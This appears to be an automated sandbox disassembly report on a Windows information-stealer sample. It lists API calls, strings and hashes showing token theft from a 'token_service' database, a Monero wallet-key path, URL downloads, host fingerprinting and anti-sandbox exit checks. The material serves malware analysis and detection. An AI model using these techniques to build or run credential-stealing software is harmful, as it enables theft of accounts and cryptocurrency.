lstrlen.KERNEL32(00000000), ref: 00BEBDB9

Strings

AccountId, xrefs: 00BEBCC4
AccountTokens, xrefs: 00BEBABA
AccountTokens, xrefs: 00BEBB49
SELECT service, encrypted_token FROM token_service, xrefs: 00BEBBEB

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
API String ID: 3073930149-1079375795
Opcode ID: b0c6eef3b053b3f305ccf516325152e297ac3176b6651036b98db0c52fb7af43
Instruction ID: 03f83e694f5ee0d534e4b61b45f12d12dba7ebb171e7b0014c9d8533ffa4d132
Opcode Fuzzy Hash: b0c6eef3b053b3f305ccf516325152e297ac3176b6651036b98db0c52fb7af43
Instruction Fuzzy Hash: 83B111B191010C9BDB18EBA4DD56EFE73B8AF54300F4445A8F60AB7091EF746A4DCB62

Function 00BE4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00BE4FCA
RtlAllocateHeap.NTDLL(00000000), ref: 00BE4FD1
InternetOpenA.WININET(00C00DDF,00000000,00000000,00000000,00000000), ref: 00BE4FEA
InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00BE5011
InternetReadFile.WININET(?,?,00000400,00000000), ref: 00BE5041
InternetCloseHandle.WININET(?), ref: 00BE50B9
InternetCloseHandle.WININET(?), ref: 00BE50C6

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
String ID:
API String ID: 3066467675-0
Opcode ID: 697011defb4e9d1fd06bb42f0089df0a0c6113c333664c57587bdb00b854f9dd
Instruction ID: 9b71e582c6009548055fdb6a87621c0b535b796a776f73941efa3a8beef2c010
Opcode Fuzzy Hash: 697011defb4e9d1fd06bb42f0089df0a0c6113c333664c57587bdb00b854f9dd
Instruction Fuzzy Hash: B131F7B4A00218ABDB24CF55DC85BDDB7B5EB48704F1081E9FB09B7281D7706AC98F99

Function 00BF8100 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0173DF28,00000000,?,00C00E2C,00000000,?,00000000), ref: 00BF8130
RtlAllocateHeap.NTDLL(00000000), ref: 00BF8137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00BF8158
wsprintfA.USER32 ref: 00BF81AC

Strings

%d MB, xrefs: 00BF81A3
@, xrefs: 00BF814D

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2922868504-3474575989
Opcode ID: e7d42812be2b302b1667c7bbf5bd9c3f2318088e095a6835fcac33652c5e339d
Instruction ID: 289f39f8aeca7655e23f2932d85c032cc528c2455dffd837726e9432b0d9c872
Opcode Fuzzy Hash: e7d42812be2b302b1667c7bbf5bd9c3f2318088e095a6835fcac33652c5e339d
Instruction Fuzzy Hash: E72127B1A44208ABDB14DFD5CC49FAEB7B9EB48B00F104659F705BB280C77869098BA5

Function 00BF83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00BF8426
wsprintfA.USER32 ref: 00BF8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00BF847B
RegCloseKey.ADVAPI32(00000000), ref: 00BF848C
RegCloseKey.ADVAPI32(00000000), ref: 00BF8499

Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6

RegQueryValueExA.KERNEL32(00000000,0173DFD0,00000000,000F003F,?,00000400), ref: 00BF84EC
lstrlen.KERNEL32(?), ref: 00BF8501
RegQueryValueExA.KERNEL32(00000000,0173E150,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00C00B34), ref: 00BF8599
RegCloseKey.KERNEL32(00000000), ref: 00BF8608
RegCloseKey.ADVAPI32(00000000), ref: 00BF861A

Strings

%s\%s, xrefs: 00BF844D

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: f4c53f8de5d7b796f68c427df4743adb3d42086176ea76565866c84316d61f94
Instruction ID: 9b2d45cf22d9b22c8b5531dfbc19e8490c6e87093eb9cafb2ea7bbb80a57a9d5
Opcode Fuzzy Hash: f4c53f8de5d7b796f68c427df4743adb3d42086176ea76565866c84316d61f94
Instruction Fuzzy Hash: 6921D8B191021CAFDB28DB54DC85FE9B7B8FB48700F04C5E9A609A6140DF716A8ACF94

Function 00BF7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF76A4
RtlAllocateHeap.NTDLL(00000000), ref: 00BF76AB
RegOpenKeyExA.KERNEL32(80000002,0172C0E8,00000000,00020119,00000000), ref: 00BF76DD
RegQueryValueExA.KERNEL32(00000000,0173DFE8,00000000,00000000,?,000000FF), ref: 00BF76FE
RegCloseKey.ADVAPI32(00000000), ref: 00BF7708

Strings

Windows 11, xrefs: 00BF76BD

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 4db9bac4d39641831728f246937adb6602ebe0a2cb451fb3601af82b89b66a9c
Instruction ID: 74fa9e40de2811d572315f60b667d3fd8ad4cc6286992a8bf2bf9717c86c67c7
Opcode Fuzzy Hash: 4db9bac4d39641831728f246937adb6602ebe0a2cb451fb3601af82b89b66a9c
Instruction Fuzzy Hash: CC018FB4A40208BFEB24EBE5DC4DF7DB7B8EB08701F1040A4FB04E7290DA7099098B51

Function 00BF7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7734
RtlAllocateHeap.NTDLL(00000000), ref: 00BF773B
RegOpenKeyExA.KERNEL32(80000002,0172C0E8,00000000,00020119,00BF76B9), ref: 00BF775B
RegQueryValueExA.KERNEL32(00BF76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00BF777A
RegCloseKey.ADVAPI32(00BF76B9), ref: 00BF7784

Strings

CurrentBuildNumber, xrefs: 00BF7771

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CEF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000DAB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000E2A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.0000000000FCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936810682.00000000010E8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937018615.00000000010E9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937116692.000000000128B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1937128735.000000000128C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: a9b4693d9b36726d326eb99f6dc4a42ae7db47ce5ed326a88dcfd98cf3853b2c
Instruction ID: 1f74895895f8bf65b8461b7b97c9ba353db69fe39d9f2f27f6ed155d12009c29
Opcode Fuzzy Hash: a9b4693d9b36726d326eb99f6dc4a42ae7db47ce5ed326a88dcfd98cf3853b2c
Instruction Fuzzy Hash: 140144B5A40308BFDB14DBE1DC4AFAEB7B8EB44700F1045A5FA05A7281DA7059058B51

Function 00BF69F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00BF9860: GetProcAddress.KERNEL32(74DD0000,01732368), ref: 00BF98A1
Part of subcall function 00BF9860: GetProcAddress.KERNEL32(74DD0000,01732218), ref: 00BF98BA
Part of subcall function 00BF9860: GetProcAddress.KERNEL32(74DD0000,01732428), ref: 00BF98D2
Part of subcall function 00BF9860: GetProcAddress.KERNEL32(74DD0000,017324A0), ref: 00BF98EA
Part of subcall function 00BF9860: GetProcAddress.KERNEL32(74DD0000,01732470), ref: 00BF9903
Part of subcall function 00BF9860: GetProcAddress.KERNEL32(74DD0000,01739230), ref: 00BF991B
Part of subcall function 00BF9860: GetProcAddress.KERNEL32(74DD0000,017258A8), ref: 00BF9933
Part of subcall function 00BF9860: GetProcAddress.KERNEL32(74DD0000,01725A48), ref: 00BF994C
Part of subcall function 00BF9860: GetProcAddress.KERNEL32(74DD0000,01732380), ref: 00BF9964
Part of subcall function 00BF9860: GetProcAddress.KERNEL32(74DD0000,01732260), ref: 00BF997C
Part of subcall function 00BF9860: GetProcAddress.KERNEL32(74DD0000,017322D8), ref: 00BF9995
Part of subcall function 00BF9860: GetProcAddress.KERNEL32(74DD0000,01732440), ref: 00BF99AD
Part of subcall function 00BF9860: GetProcAddress.KERNEL32(74DD0000,01725748), ref: 00BF99C5
Part of subcall function 00BF9860: GetProcAddress.KERNEL32(74DD0000,01732458), ref: 00BF99DE

Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788

Part of subcall function 00BE11D0: ExitProcess.KERNEL32 ref: 00BE1211

Part of subcall function 00BE1160: GetSystemInfo.KERNEL32(?), ref: 00BE116A
Part of subcall function 00BE1160: ExitProcess.KERNEL32 ref: 00BE117E

Part of subcall function 00BE1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00BE112B
Part of subcall function 00BE1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00BE1132
Part of subcall function 00BE1110: ExitProcess.KERNEL32 ref: 00BE1143

Part of subcall function 00BE1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00BE123E
Part of subcall function 00BE1220: ExitProcess.KERNEL32 ref: 00BE1294

Part of subcall function 00BF6770: GetUserDefaultLangID.KERNEL32 ref: 00BF6774

Part of subcall function 00BE1190: ExitProcess.KERNEL32 ref: 00BE11C6

Part of subcall function 00BF7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00BE11B7), ref: 00BF7880
Part of subcall function 00BF7850: RtlAllocateHeap.NTDLL(00000000), ref: 00BF7887
Part of subcall function 00BF7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00BF789F

Part of subcall function 00BF78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BF7910
Part of subcall function 00BF78E0: RtlAllocateHeap.NTDLL(00000000), ref: 00BF7917
Part of subcall function 00BF78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00BF792F

Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,01739040,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12

Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01739180,?,00C0110C,?,00000000,?,00C01110,?,00000000,00C00AEF), ref: 00BF6ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00BF6AE8
CloseHandle.KERNEL32(00000000), ref: 00BF6AF9
Sleep.KERNEL32(00001770), ref: 00BF6B04
CloseHandle.KERNEL32(?,00000000,?,01739180,?,00C0110C,?,00000000,?,00C01110,?,00000000,00C00AEF), ref: 00BF6B1A
ExitProcess.KERNEL32 ref: 00BF6B22

Memory Dump Source

Source File: 00000000.00000002.1936479595.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true

Associated: 00000000.00000002.1936446052.0000000000BE0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C3A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C68000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C72000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000C9D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CC2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1936479595.0000000000CCF000.00000040.00000001.01000000.00000003.sdmpDownload File
